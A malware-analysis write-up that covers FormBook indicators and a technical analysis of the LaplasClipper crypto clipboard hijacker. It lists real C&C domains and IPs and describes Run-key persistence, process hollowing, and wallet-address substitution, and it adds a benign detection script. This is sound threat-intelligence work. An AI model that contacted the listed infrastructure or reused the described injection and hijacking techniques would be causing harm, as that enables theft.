![image](https://user-images.githubusercontent.com/91592110/170880106-f0494a60-db74-4db8-ad6e-88f7a73b16a2.png)

![image](https://user-images.githubusercontent.com/91592110/170880113-adaacd9b-ce2b-4327-a99f-49227a9225eb.png)

After reversing this file, we would find another Portable Executable (PE).

![image](https://user-images.githubusercontent.com/91592110/170880189-0e4fc9c5-dc7c-482d-a713-a2eea545123a.png)

Later, dealing with the strings and obfuscation while debugging, we
would find a library.

![image](https://user-images.githubusercontent.com/91592110/170880214-0fd6e872-92b9-410d-af9a-d81354baf329.png)

This DLL has been widely reported, so we can guess that this step is quite common and that it does not usually use very different binaries in later phases.

![image](https://user-images.githubusercontent.com/91592110/170880226-a6bd6631-7b81-41a7-9e13-af75f04fd3cf.png)

This library will be injected into explorer.exe, where we will see the functions for, depending on the version, keylogging, stealing, etc. The point of interest will always be a connection to a C&C to which it sends all the relevant information about the computer or the user.

Specifically, this sample makes requests to the following domains from explorer.exe:

```
www.heyconi[.]com
www.executrainpr[.]com
```

The most common thing in FormBook is, after the injection, to auto-delete the files previously dropped in temporary paths, for which it usually uses commands with cmd.exe or Powershell.exe.
# _IOC

```
16a81a265cea156034bea5db891d480535cf697bdd8c8917fc6d994c33ddfdf0
6a1304d1c9897938d2217e62aee0f4a79af9535dce964f0661e67139948a380e
075f41c576c8e20d1ec1981a5e4197d514030c69dd653dfc2b94edf5088a0671
363c3288efc15bdba3db28988766e6554fca04e6bcb49e094f7a521388016fe8
45734f6c2bf14e396031f665963c7f03e74c1b989a58111a1f5dcf2c05d1e5fc
1ec2c2c0a29c16146400c52880e887cfae57223b2b621c0f433ef9b619af5343
02cda7e8e87599f480515b611d57653429825d45dbfd2bcee0b9f1ea8e845fc6
e4769e3e2b77ecaf145799bbd14fc3ebe7b7032f12f34807c59f59cee8eb063d
0e3a4f080d2ff0bdfa0a7e39df4982232b2d19245e6355e49940c05becfeecc5
03fa6bc991b15a3d5cd507673d1cccd0b0279315e9a04924d908a9520609a1c3
a734d235386d77a1c6a88bdf63efce5134a82a90e113be647200401b717b891e
f6b976e82b1b830539413b6356f8f2d61432bc2f59d5dfa2833bcab6ed4b3885
f080b3ba979f854761526f4bc6bd5b8210b48d5f91f15b1a1423849107775e11
bd89fe68b099ed00bea985dbdf7c8c0d87deb5a85c29d7a27f09764ab5b9d04d
bcd31729e663369b99fd178377977c5de078512046d2cb4b38c51d80d9801374
15e17fe1832e832ad58893aa8d5f2e8e33e2fa756d509d2e855daa6a1f4d4027
2979a77144d0df70f4dff084420d8e034eb6f751027fa44d158de924960f2a6a
eddc1ee1fafda4fe7cf6d114276c992806f33d7527d346464bad7033875fbd66
b1151fa2ddbc4bedbd3bcd7112ff359747776e38a7a57d20572ffaae4170d485
0d49317865221f81e49e88f6473af6639f15725fa9c894d1d4ee605de3951b65
6796f10e7f6140f26a49bf9446b2c75dfe0e6dc7d7d88cad5e09d9b608107851
8535282c1740725ecf68a65e9ce582a5fe28db4ffcfcd07e6b1516d62cc9dc60
2a25e0a533b850782b1fff19767de5ef74df1c9c02541c510f68d42dddf35cb5
b5e186f373c99f75db50a9b6689f835d4c141c6f369fa63d58da21b5fa13e90d
8dca7773c881a5f13083046667a97227e4d2ff0b833300ae8b9ae731847dc7ca
1868d031ba42f5f9b2f176f218647509ebcbf1171ed0da75a594a26744d03d9a
59513c88f8f80d7a7c871c8f31f7bdf3e96d9831ec74ee9563845c202957a9cf
10e55528343098fef510828eea445cddd10d15d04e119ccadc3745c19adc458c
9f3d95b9160149fcdfd2d59114d87917abd2a8b903e1e3f5ccbdae11b1c28d68
6a4dcd405fe4ec854fd0bfa69f852b2a53e4cfa8bed45c7affeb4f86e963cb08
dd60e55c229563801df128c29f52b21bc1cf22625c8b4b9442b2d7839c9175a4
5c8cdc3745711d1054704b8663828b005aa7a66535b0004c0364bc5cff832ddc
5d63cb62e9c2099fa70b843c45883c69237a557d5d7198499c37a95789f00bd4
f46d6d7bf1c9f466498c2a11c9c96fcc594c3490db04e763f81e7552f7ae6764
b01c10020580708d2d28cd94e8ec15fba89d16794a788d0a09928fb2af068117
669281f9aa118bef43b360b346e7954d6e1e9f04da0c8bff68387a2730c8e928
25966cc19f04cbbdacdf04249247d606c037cb527669addbfb0d52e0cd948519
edcbff4e011d46b1c1918479985c8bb094d02cdf9494f87903df9faeb6555c09
24b22264a9954fe9763f2a35d92088be412600ae1e0e6fc8586925a18216c967
0f87b6c475a0eddbf33a364ed0fbef4f5cd19f8d4776ffad5d0bf0db9d63fc42
ce757f9bd6a6ba9c9b7b27d3923b1dfca6e82b6a955fdf92c91975db6b1abdfb
5d6683dd926e5e76d11b522fdc8037584d272a5e4fd3a71274acfb4b2e663497
127250091242413bfb4b360d4ce13d926fbf85a38af2064e0fb73332b526bfad
67df49c1f0f94c41c91df4cb71835b1e188d19a19b5eb1346f1e0da4444d13d0
e17bfb8370c8badf90756f650e1be4794e77a57abb3619c30789364756304759
cd055a7b832bc32db20e93992cbc4df3698599747d51ebbb091af91156f82dfb
7754ed56a4703d27cf7447a206cb22f1aa1063d35633062e44860d8652d3b3dc
766524a72025be11ab13f0d5fe4dfefc295e3d43776aea18bdd1f48406eb7e95
dad0603f527e69265ceddd96b09ff61a98841698d35b79ab72e5314ed1b1d2fa
15f2d230db5e36766301585f9db25513f00150e6ef6068505ab3415af17b3b0b
08bac2df27e5bc147a3fbc1eec996d1a9202dfe66cdd7cada83a21ae7ac45bbc
7e675bed2dcde312da5e4304573eebda886e61e542f5b40840bd37d5e90cafe5
8bb0378626735cca62f8512257a07c429847109d26d5383cd7eb4915ac13ea4e
5c31ec6dd2c16e34ac9c533b1e58e047e7da0e426909f41fb66a55372e3155e2
b1b671842ea0b17a67e78741ceb401ccee0907e55c7a365aa78bf17aebe8e356
a29867a44dc382a736370078a8f8ad7ef1f2d1ee9da27d07e1204ea34f3cafb0
8acf479508cca8603513d380e418178f465e0fa867c0e7e51df8b22ac763c134
2bba06807ad9fd0bdc1957a15f32c93b18f9663182e87d0a72956cf26142b497
a440ad6e3c6d444ce1566fb0f29b25314f7a503615c17a27acc6aab671d130ca
41e1a9d2e39315c76c908d4d40150e930898e6221bcd96187413beffc2572315
fc8dedb234d17ae5d5e58eaf372988114b82bd1a9defe9934e8d7738e15a88ab
b9148dfec92ec25753e9a70e51ef698bc44a66be852a84b6e5296f873cf0ea79
fdea12592b9bb743e5320d9222be5e3d38ea78d0f346eababaec749d31185e7e
7b129fd22e90e55cbdddfd760c4e86df11e2998fbb3ea126bb98b72c18997bb3
fa318879db358e490dc763417711d144a17bd5ad8061821a1e820521ebefac16
45e8352d78b438ccf83d36f8679b58110a7296d65619f92e1f06c5da5d349ff9
d5c2e24b2a27a822fd7a2611be1ed64daa804eab1819546030141407e28e941b
bc89bbfbb6a41a488a2ad9a1a55be9ba28b1ff3501a4d22072ead32b121836c9
eebc2ceadb7e9541112a27a583603fd284208f1e2d23329c726efcfc02244609
5b39db4d27b6a3c5822a06632dedb65df333f7ab938433ed4761eaf88cebf4e8
3d4f0f70fc18a3b464a938ffb32fb693329993738991b2fa2e2f1a3faf84e7b8
8ba9d40ae5f7da84438fa7b46c2ba376afc0aacf4d806a0c9d2bf323d4da21d3
3caaa84ffcbd28e8f6a95a11a8101508c06ee47dd00a93b0d52960e351e4a97c
5139afa0b3dc677c0a4f3cfdf93f65ede82a9ea6502ac87785603d5583e8f15a
c01d1ca58e3801fd34ad3ce6385454348ab04c58a7ac8522bb214960e6642d0f
dc473948da9ebd0cd7647b5894d0b84796d42010a965d94765330550f715b28e
95e3a34bb2edf3cb9eeccd4e08af7218a4580f945969da5ae948a47bd7f3bac1
d37adce208895b993397f3fe975bef95bdb4544837ea3017ed1f15ed7da9b1f8
86db6c461a0c42868398aa5dd8b95c1f2748cc05c444ba4840d6772ccedc1a33
8462fd9066d10c0507394c75d66c915e0bd04e4b7107dac752d7855abe3ee3da
98b28d84bb0b1479d10646a5d34d02f9e25718adc285634fb11d407188089e1d
c4dd940d7d23aba5aa3c4b6b2f09701180631fcfe0e5756cf242b16514824daf
8ddee8d21d6847b663197cd64682cafc4a34bcc0a86af6a5e82f0bddfa838aee
df1b0eef4f32a5c2527691175375962957db71bc913d37f6e71150e599b2b31c
62d4b809036b03226c7b5c36b6126d97cc1ecf915200146391bf05e74c58e874
ddc510c3b697c0c9d361f7ef5d62cb101d134a81dd76a25a4c08031afb6e936a
df45997fda4f29688fe71512f82e6b5cd826c917d3c269fd51c1fa32d4890ad4
c8cab98913ed816e5302e5d6bdf36b565088b35c0235e017879acba43219015b
855a1eca9c5b0a87ae4bd3c993fa9582807db1f7620e63d558f310826f17f5bb
bc56169e0d244106d996f013991bc22087310511ee4a5eb00605132970ece0aa
af6e8234a2211a8b50c4e4de3f8a268b3ee98cb6bdc94959c4f1cc88ab8e3b66
fd41933f53e4d9c08e9c7c17f22206bf6599dc9f912be87e2c09bb05a10013a5
e0047eef676c9123a68230bf0c600b067aa0783a934205d26c63d997c4fae82b
a9ccf164caf3f859b3233f50fd77ba7ca837317338d055841a414dcb60a757dd
d24ea1fb5048a0cad103d4e728f7089562bc3397d7e6cc5a7933a12ed4b658f1
62c5952200a46bc706021d3102ef6d4e8e11b854750156a770643107a2538ca2
4aaa5e4ef84050dc285108aab6c668adb84d69ff1e2233bcb2d0149478a4bfeb
7a34ef3a5f0d2db6674d93de3143d2469d8fa06bf450dc4c1609c97822e68f53
2da5d0fab4e517de649c1116c62b23202b6d4b46a99f1aa05d44d345d280ca10
89cdf1763a4e844821117df0e03d1447ec951fa3d512e53356c1af5c1a96b2d0
7230d625e58f4378e6bbd34d4ed2d55a79f3ad941d21efd18ba16e5afc7b00e4
b6fbd1e6813b72c6451666ad593bbf0eb259df260c3f3d2fcc962a5cb317c98b
18fffdf046406f3e77b5710a25907406275df9936a76b32977e0956b20d48612
01271534c6ea0137c8b7e38b66b13f34272d3196fd8e0926c2d24b3a7c4547fc
db912789ffc493f082adea43b0213611eb8f30691ec2496cf2ce534f67473cda
1cb12659200d6324c3c3507407da00197b47e73fdbbac955b1b0ea13828345ee
ea279885af5791b59110e398c288085ca4018a93233514d2baef1fc821540e3d
60fa13c5e86925ce4a8a7a957de158a478c5c16180f621e93da1adb12aba0195
85ce49f0532bcb23b394c9af68f6b816670d5deeba332c15aae2ed158a10f19e
3a3446d2795cada474dd50f01d0f71ac26898c4773a2fb87db675040a558a8dc
a00b755ef03464d7999af3d3cdaaa1c446d98e616856264b76173450306c5e68
5321a383609006479672cc42334489cbb2dcc17eeb8af688350a1d4bce1df3d0
65f71681c11a1bf83be0a343dd03afc5927e20d40487fe746156f3aaeedfd5d4
e2578171e1b9bcf0282b5246a8c6cb79829387a340ca70fecdc7c48c2f6ae24c
fbcdf1532a2095924283e9d60f013d107036cdebce2772bfaf41b429931fdf58
45396624a6baf645800513cdbc6111703399e137c63c4498c0e9cfbc99b141f9
05d32cd3b93a055d165a689e3c561d6b32a291449ef4dbb2477d7b4153d7583e
bdc4cafefa90b60f8a60053bd589de648061cb51ec80dd15785746d601b1a345
88839c72ad1124401faf0d4ba7c20799c0825fd14c45aed2b27f9eb068abafce
a36ca6406a273cb0d73b0c76e66c559cd140c1941024b37f6e89a10ba4a0e3d8
c234510a389c16b722b67ba7896e49c034a03d06bbe42a787f02522d25a9431d
e22cc7329a3ee317a838f8420bddbee282bf9667ff74ffc2fa446468639f5349
33eff767b99def77e4d5ca2586a16b3e573b38b675d03dad841761093f067227
7b0d50834f7903e476e8dd9be42c3e68e9efe722a65fc90e77e5e0f025476535
19a9ec9da618f09710fd8e6e1daec72377e05e78bd7469f33e203a9529d712fd
db10e161fe1e1e3c38b8865a487d134445fb0f07a5e8fe466f75948e2a605b5f
f2ac93d21112c60a3f5a2e0b2f86ca1b9ae688680754140d031b15752e2df6ba
6ccee842a4957d3410ae6163bb96a9b7739b3ffc3032dfeeb2a3c7b273ca5656
401a430936fe880e531de6c2476df50ed9be9e5bc9c8ea5149657b16b4a1eb84
222ad93c9537bc72a00d01aaeab70acaea61210fb0de3967d671920848c87b04
b4e446102081c3dda96a91145270f8a13ce318b708bea3921bc286e4c6fcc2a2
b0b3a059f434681f3f6cee2e2fcea6e91894255d7b63b0116d897b3e83b69e1a
6b7f36519cdc4a69ebc2e6986331da18741bdb3eaf1f6dc4bd7e8acc3db77382
494cf04c6406ba864ce890869984fa9e779751b0ad76c0e55ab28ec898d088b9
544e3462ef5a4adb7d39c3022a17d13b9eb55db435e38c55bd02b5433ea546b8
b8e464201936080cd2e6b7fe6e93a2b6a66622ab361fee8cf0dad92d1616b0d5
937e7a7aea799b2b5d57d66077d66567545fd2010149df9ff90e639ecad62386
3946f3036e103af4caf04607d09ead4968fc0240881596f5e95db307f260d898
f0b819044a3bd7d24e2adfcf4fbed1f6ba6ca0a93fe29b6abf5f6dfe5279b8c7
d640fe3968dbefc28ce7ae480b3e01578c6a1232087d7d17f96fbe35d89c19ae
c7b09601e132a1d10735f89dbec1fa98c2271b102d9a07b8bb41858775172312
4024f6526ce45d32b49b46ee1b708a84ffb68b8204abb231d76f850161f5b38c
fb410f778d6b9ee7fe146ddeef7601bb1428c737f01cdb6885aeafe6d25d5d18
298d3c150bbee5312da015cd6448e7dc47eddcda5a6ddd215072102b6ba9e9e3
0d6f7d870b27c6d1ad339d5d8f964913ca3830465ad33bc499b64c034991bc66
Bcde5526481770c7e19f3077b14396497bc21e751c509e0f9d4374f424b5e69a
bd7323675e66df34d833d17897c6f98e9848dd062be6f299f482c09a90de4255
C0ee1071e444f415f8b62856a0896f3b22e563f1bb4f03d14142583efe49a565


142.93.110.250
45.151.250.142
198.185.159.144
185.53.178.7
162.159.138.85
216.218.185.162
138.199.37.226
13.248.216.40
107.175.212.60
103.145.254.203
180.214.236.4
37.0.11.227
180.214.238.224
198.12.84.30
103.167.92.57
198.12.89.141
103.171.1.178
103.156.91.153
192.210.240.32
104.168.33.25
192.210.240.37
107.174.138.146
23.95.52.206
107.175.3.53
212.193.30.214
107.172.73.137
107.173.191.123
179.43.175.179
198.46.136.246


trieutin.com
dj.ruppersalimentos.com.br
prosperbusinessdepot.com
vitrifrig0.com
basbeigium.com
tatlub.com
rajparis.in
www.heyconi.com
www.executrainpr.com

```
> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:


--------------------------------------------------------------------------------
/LaplasClipper/LaplasClipper.md:
--------------------------------------------------------------------------------

# _Overview

LaplasClipper (Laplas Clipper, also known as Laplace Clipper) is a well-known malware that operates as a crypto clipboard hijacker. It has been in use since 2022. This malware can be purchased from its portal for as low as $49, with payment structured as a monthly subscription.
LaplasClipper has been employed by various criminal threat actors to steal cryptocurrencies.

This malware gains access to devices through various methods. It has been observed being distributed through YouTube video links or compromised websites, as well as through links to files containing LaplasClipper loaders. It has also been delivered via spear-phishing campaigns. Recent versions of the malware establish persistence in the registry and inject themselves into files they create in order to gain an advantageous position. From there, it monitors the clipboard, waiting for cryptocurrency wallet-related information to be added. It modifies this information to hijack the cryptocurrency transfer toward the attacker's server.

As I said, Laplas has been involved in several executions related to other malware or loaders; some of them, which are related to active groups, are the following:

* VidarStealer
* SmokeLoader
* AresLoader
* RedLine Stealer
* AgentTesla

# _Technical Analysis

As mentioned earlier, LaplasClipper has various initial access vectors through which it can infiltrate affected devices. Its ultimate goal is to modify the clipboard in order to alter cryptocurrency transactions.

An illustrative example of its steps is as follows:

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/8b5d9b26-7636-4fed-944b-51c120b495a0)

With this diagram, I aim to provide a general understanding of how new versions of LaplasClipper function. I've reviewed recent samples and found no significant variations between them. Therefore, the execution tree of current LaplasClipper versions should be similar to what I present below:

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/cb87f88f-a676-4f2d-9a23-151d062ab9bc)

We can observe the execution of a binary that establishes persistence in \CurrentVersion\RUN.
It also launches a file named "ntlhost," which is subsequently injected. Notably, the name of the dropped binary ("ntlhost") and the writing path vary; these are the most noticeable differences I've identified. Examples of these paths are the following:

```
C:\Users\\AppData\Roaming\NTSystem\.exe
C:\Users\\AppData\Roaming\telemetry\.exe
```

Regarding the persistence aspect, there isn't much mystery. The binary creates a file (which we will see shortly) in a temporary path; depending on the version, it could be one path or another. It then modifies the registry key and adds the newly created path. This ensures that LaplasClipper executes with every login.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/8d9d4da4-9d12-4c7f-8fdd-577a5ea0475f)

At this stage, we've discussed the creation of a file. It's intriguing that the relatively recent samples I've encountered are quite heavy. This is a common tactic used by some malware to deter analysis: such samples slow down automated analysis systems, increase the time taken for reversing, and so on. Essentially, these samples contain unnecessary functionality that doesn't justify their weight. This becomes more problematic when the malware creates a second file in temporary paths.

In terms of file writing, the analyzed samples make heavy use of multithreading. Threads are used to speed up the writing of the binary. This approach makes sense, given that the files launched in temporary paths are typically large. As I mentioned earlier, in this routine we can observe how the binary gradually writes the file before releasing it, leaving the file in the path.
![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/04fe9b1f-fa46-4203-aacb-51fe8cfa36d3)
![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/8f747c20-8e5a-49f9-8373-eab53c2e5d25)

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/076e7728-589c-41a4-bf0f-bbd164426620)

Following this, I started comparing the files. It seemed unusual and uncommon for malware to drop itself, so I anticipated that it would weigh much more. However, upon examining its functions, strings, and data content, I found that its functionality was mostly the same, with the addition of a significant amount of data at the end.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/7d26723c-c8c5-493f-935d-bece1f6a084f)

The binary operates heavily in memory. Depending on the version, I encountered samples packed with MPRESS or ones with obfuscated sections that were gradually deobfuscated at runtime. Consequently, in addition to the functionality Laplas already possesses (excluding packed versions), it imports numerous libraries. During runtime, it dynamically loads more libraries and resolves imports using GetProcAddress + LoadLibrary.
![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/491e9417-a8d5-4772-95b7-b8ecad72f348)

Some of the loaded imports/functions include:

```
AbortSystemShutdownA
AbortSystemShutdownW
AccessCheckAndAuditAlarmA
AccessCheckAndAuditAlarmW
AccessCheckByTypeA
AccessCheckByTypeAndAuditAlarmA
AccessCheckByTypeAndAuditAlarmW
AccessCheckByTypeResultListA
AccessCheckByTypeResultListAndAuditAlarmA
AccessCheckByTypeResultListAndAuditAlarmW
AddAccessAllowedAce
AddAccessAllowedAceEx
AddAccessAllowedObjectAce
AddAccessDeniedAce
AddAccessDeniedAceEx
AddAccessDeniedObjectAce
AddAce
AddAuditAccessAce
AddAuditAccessAceEx
AddAuditAccessObjectAce
AddConditionalAce
AddMandatoryAce
AddUsersToEncryptedFile
AddUsersToEncryptedFileEx
AdjustTokenGroups
AdjustTokenPrivileges
AllocateAndInitializeSid
AllocateLocallyUniqueId
AreAllAccessesGranted
AreAnyAccessesGranted
AuditComputeEffectivePolicyBySid
AuditComputeEffectivePolicyByToken
AuditEnumerateCategoriesBySid
AuditEnumerateCategoriesByToken
AuditEnumeratePerUserPolicyBySid
AuditEnumeratePerUserPolicyByToken
AuditEnumerateSubCategoriesBySid
AuditEnumerateSubCategoriesByToken
AuditLookupCategoryGuidFromCategoryId
AuditLookupCategoryIdFromCategoryGuid
AuditLookupCategoryNameA
AuditLookupCategoryNameW
AuditLookupSubCategoryNameA
AuditLookupSubCategoryNameW
AuditQueryGlobalSaclA
AuditQueryGlobalSaclW
AuditQueryPerUserPolicyBySid
AuditQueryPerUserPolicyByToken
AuditSetGlobalSaclA
AuditSetGlobalSaclW
AuditSetPerUserPolicy
AuditSetSecurity
BackupEventLogA
BackupEventLogW
BuildExplicitAccessWithNameA
BuildExplicitAccessWithNameW
BuildImpersonateExplicitAccessWithNameA
BuildImpersonateExplicitAccessWithNameW
BuildImpersonateTrusteeA
BuildImpersonateTrusteeW
BuildSecurityDescriptorA
BuildSecurityDescriptorW
BuildTrusteeWithNameA
BuildTrusteeWithNameW
BuildTrusteeWithObjectsAndNameA
BuildTrusteeWithObjectsAndNameW
BuildTrusteeWithSidA
BuildTrusteeWithSidW
CancelOverlappedAccess
ChangeServiceConfig2A
ChangeServiceConfig2W
ChangeServiceConfigA
ChangeServiceConfigW
CheckTokenMembership
ClearEventLogA
ClearEventLogW
CloseCodeAuthzLevel
CloseEncryptedFileRaw
CloseEventLog
CloseServiceHandle
CloseThreadWaitChainSession
CloseTrace
CommandLineFromMsiDescriptor
ComputeAccessTokenFromCodeAuthzLevel
ControlServiceA
ControlServiceExA
ControlServiceExW
ControlServiceW
ControlTraceA
ControlTraceW
ConvertAccessToSecurityDescriptorA
ConvertAccessToSecurityDescriptorW
ConvertSecurityDescriptorToStringSecurityDescriptorA
ConvertSecurityDescriptorToStringSecurityDescriptorW
ConvertSidToStringSidA
ConvertSidToStringSidW
ConvertStringSecurityDescriptorToSecurityDescriptorA
ConvertStringSecurityDescriptorToSecurityDescriptorW
ConvertStringSidToSidA
ConvertStringSidToSidW
ConvertToAutoInheritPrivateObjectSecurity
CopySid
CreateCodeAuthzLevel
CreatePrivateObjectSecurity
CreatePrivateObjectSecurityEx
CreatePrivateObjectSecurityWithMultipleInheritance
CreateProcessAsUserA
CreateProcessAsUserW
CreateProcessWithLogonW
CreateProcessWithTokenW
CreateRestrictedToken
CreateServiceA
CreateServiceW
CreateTraceInstanceId
CreateWellKnownSid
CredBackupCredentials
CredDeleteA
CredDeleteW
CredEncryptAndMarshalBinaryBlob
CredEnumerateA
CredEnumerateW
CredFindBestCredentialA
CredFindBestCredentialW
CredFree
CredGetSessionTypes
CredGetTargetInfoA
CredGetTargetInfoW
CredIsMarshaledCredentialA
CredIsMarshaledCredentialW
CredIsProtectedA
CredIsProtectedW
CredMarshalCredentialA
CredMarshalCredentialW
CredProfileLoaded
CredProfileUnloaded
CredProtectA
CredProtectW
CredReadA
CredReadByTokenHandle
CredReadDomainCredentialsA
CredReadDomainCredentialsW
CredReadW
CredRenameA
CredRenameW
CredRestoreCredentials
CredUnmarshalCredentialA
CredUnmarshalCredentialW
CredUnprotectA
CredUnprotectW
CredWriteA
CredWriteDomainCredentialsA
CredWriteDomainCredentialsW
CredWriteW
CredpConvertCredential
CredpConvertOneCredentialSize
CredpConvertTargetInfo
CredpDecodeCredential
CredpEncodeCredential
CredpEncodeSecret
CryptAcquireContextA
CryptAcquireContextW
CryptContextAddRef
CryptCreateHash
CryptDecrypt
CryptDeriveKey
CryptDestroyHash
CryptDestroyKey
CryptDuplicateHash
CryptDuplicateKey
CryptEncrypt
CryptEnumProviderTypesA
CryptEnumProviderTypesW
CryptEnumProvidersA
CryptEnumProvidersW
CryptExportKey
CryptGenKey
CryptGen
[...]
```

Regarding loaded libraries, I have seen in different samples that, before performing this action, it first tries to load several libraries from the new path it created (the one where it launches the file), and only afterwards loads them normally from their usual location. This first attempt from the dropped file's own path creates a lot of noise in telemetry, which makes it quite accessible for detection.
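The telemetry noise described above (system DLL names being resolved from the dropped file's own directory before the real copy in System32 is found) is a search-order artifact that is easy to turn into a rule. The following is an added example, not code from this analysis: it runs that rule over a small set of constructed, Sysmon-style file/image-load records. The user name, the `NTSystem` path, the DLL names and the result strings are illustrative assumptions, not values taken from the sample.

```python
"""Flag DLL search-order noise: a process running from a user-writable
directory that tries, and fails, to resolve well-known system DLLs from its
own directory before falling back to System32.

Added example; the events below are constructed telemetry, not captured data.
"""
import ntpath
from collections import defaultdict

# Constructed records: (pid, process image, DLL path the loader tried, result).
EVENTS = [
    (4120, r"C:\Users\alice\AppData\Roaming\NTSystem\ntlhost.exe",
     r"C:\Users\alice\AppData\Roaming\NTSystem\kernel32.dll", "NOT_FOUND"),
    (4120, r"C:\Users\alice\AppData\Roaming\NTSystem\ntlhost.exe",
     r"C:\Users\alice\AppData\Roaming\NTSystem\advapi32.dll", "NOT_FOUND"),
    (4120, r"C:\Users\alice\AppData\Roaming\NTSystem\ntlhost.exe",
     r"C:\Users\alice\AppData\Roaming\NTSystem\ws2_32.dll", "NOT_FOUND"),
    (4120, r"C:\Users\alice\AppData\Roaming\NTSystem\ntlhost.exe",
     r"C:\Windows\System32\advapi32.dll", "SUCCESS"),
    (2201, r"C:\Program Files\Editor\editor.exe",
     r"C:\Program Files\Editor\plugin.dll", "SUCCESS"),
    (2201, r"C:\Program Files\Editor\editor.exe",
     r"C:\Windows\System32\user32.dll", "SUCCESS"),
]

# Substrings that mark directories a normal user can write to.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")
# DLLs that legitimately live in System32; a lookup next to the EXE is suspicious.
KNOWN_SYSTEM_DLLS = {"kernel32.dll", "advapi32.dll", "ws2_32.dll", "user32.dll",
                     "ntdll.dll", "crypt32.dll", "wininet.dll"}


def in_user_writable_dir(path: str) -> bool:
    low = path.lower()
    return any(marker in low for marker in USER_WRITABLE_MARKERS)


def sideload_attempts(events, threshold=2):
    """Return {pid: [dll, ...]} for processes whose image lives in a
    user-writable directory and that failed to load `threshold` or more
    system DLLs from that same directory."""
    per_pid = defaultdict(list)
    for pid, image, target, result in events:
        image_dir = ntpath.dirname(image).lower()
        target_dir = ntpath.dirname(target).lower()
        dll = ntpath.basename(target).lower()
        if (in_user_writable_dir(image) and target_dir == image_dir
                and dll in KNOWN_SYSTEM_DLLS and result != "SUCCESS"):
            per_pid[pid].append(dll)
    return {pid: dlls for pid, dlls in per_pid.items() if len(dlls) >= threshold}


if __name__ == "__main__":
    for pid, dlls in sideload_attempts(EVENTS).items():
        print(f"pid {pid}: failed local lookups for {', '.join(dlls)}")
```

The threshold keeps a single stray lookup from alerting; what makes the pattern distinctive is a burst of several system DLL names being probed in the same user-writable directory, which is exactly what the screenshot summary above shows.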
![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/b61103a8-0437-4e67-8d86-a0b7525da4ea)
![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/a2f8a300-6542-4769-8ea9-8281a7300aa4)

Summary of all the attempts:

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/c80d965c-1947-47d9-b4a4-e3ab7f0e9ebf)

After this, in all versions of the malware, it retrieves system information in some way. While not its main focus, it collects elements such as the OS version, computer and user names, time, and device language. These elements serve more for victim identification by the command and control (C&C) than as the kind of data a RAT or pure stealer would extract. Notably, the most interesting piece of information I discovered was the OEM version being used on my machine.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/99845245-f0b9-4c18-b4aa-358a0db99e34)

Subsequently, with the new capabilities loaded into memory, the file written to a temporary path, persistence established, and basic victim-machine information acquired, it proceeds with the injection. Even at this stage, it doesn't perform any novel actions. It loads the file to inject into memory, opens the file written in the path (which, as we remember, was disproportionately large) in a suspended state, writes into it, and then releases it using ResumeThread, at which point we'll see it running under the filename it dropped earlier.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/cd4b6c53-17fc-4efe-ad7c-cbe7ce7da68a)

After this, we'll observe the malware moving on to network functions. I've captured various types of traffic from different samples. Here, it's evident how it makes a request to an address commonly used by LaplasClipper:

> Clipper[.]guru.

Following this, it sends data to the attacker, including information about our machine and a generated identifier.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/4cd1553b-b7eb-4e6e-9a1c-97579c60edfd)

Here's what occurs in this phase, once it has made sure that no information slipped through. The malware constantly monitors the clipboard. It uses regular expression (Regex) patterns to detect certain content, as shown below:

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/576214d9-cf13-45c3-891e-eb40bc56d160)

Subsequently, with the connection I mentioned earlier established and the information obtained, it keeps control of the clipboard. It waits for the victim machine to perform cryptocurrency wallet-related actions. This means that the malware simply waits for one of those patterns to be written to the clipboard. When this happens, it changes the wallet address to one controlled by the attacker. For instance, if you were a LaplasClipper victim attempting a cryptocurrency transaction, the malware would automatically redirect the transaction to the attacker's server.

An example I recently came across on Twitter by Jane (follow her at @Jane_0sint) demonstrates this process clearly on Any.Run.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/e8a7ecde-4b28-4491-b0ff-571433a89cc2)

Following this, having accumulated a considerable number of IP addresses from the different analyzed samples and having spent some time researching this malware across networks, I began searching for all these servers.

The first step was to examine the domain it initially connected to, and I found that everything was associated with laplas.app. However, my attempts to access the portal proved unsuccessful, so I dug deeper to locate these servers. It turned out that they had all been moved temporarily.
I recall seeing an image like this on Twitter, credited to the cyber colleague Chris Duggan (follow him at @TLP_R3D).

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/db5c7340-37fd-4ce9-9e9e-2e58db57f3dc)

I attempted to check whether the situation was the same now, and indeed, I found the same information:

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/dd70f1ac-4c4a-4bb3-a4a8-2c90b4986bd5)

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/25c9db67-e468-4603-9cfe-f79ae52bb047)

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/f1fe3388-3409-4a55-97f9-be1a1cb458df)


I then tried to see if I could reach the servers that the analyzed samples were connecting to (telemetry indicated that everything was fine, but I like to verify everything). I could indeed see both the previously discussed Regex patterns and the requests.

Following this, I began searching for the portal and found both the Telegram groups associated with the creators and the web portal. The web portal had moved from Laplas but retained exactly the same functionality. It only changed how it is accessed. Internally, it functions the same and sends information in a similar way.
However, it's now controlled from a different hosting location:

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/9be55bad-bee6-4328-bbdd-9f8bd11261a2)

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/7fe8e695-3178-4f07-a8e6-36b0b0e58306)

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/36ceaf34-10c9-48a8-bc18-cc26383737a2)


